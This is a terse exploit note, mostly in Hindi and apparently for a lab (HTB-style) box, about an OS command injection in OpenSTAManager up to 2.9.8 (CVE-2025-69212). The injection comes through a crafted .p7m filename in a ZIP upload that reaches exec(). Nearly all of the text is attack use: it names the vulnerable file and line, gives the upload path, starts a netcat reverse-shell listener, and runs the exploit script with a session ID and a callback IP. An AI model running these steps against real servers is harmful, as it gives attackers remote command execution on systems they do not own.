
OpenSTAManager <= 2.9.8 — ZIP अपलोड में दुर्भावनापूर्ण .p7m फ़ाइलनाम के माध्यम से OS कमांड इंजेक्शन।
फ़ाइल: src/Util/XML.php:100 — exec() में बिना सैनिटाइज़ किया गया $file
वेक्टर: /plugins/importFE_ZIP/actions.php → ZIP → .p7m फ़ाइलनाम → exec("openssl smime ... -in \"$file\" ...")
# Listener
nc -lvnp 4444
# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444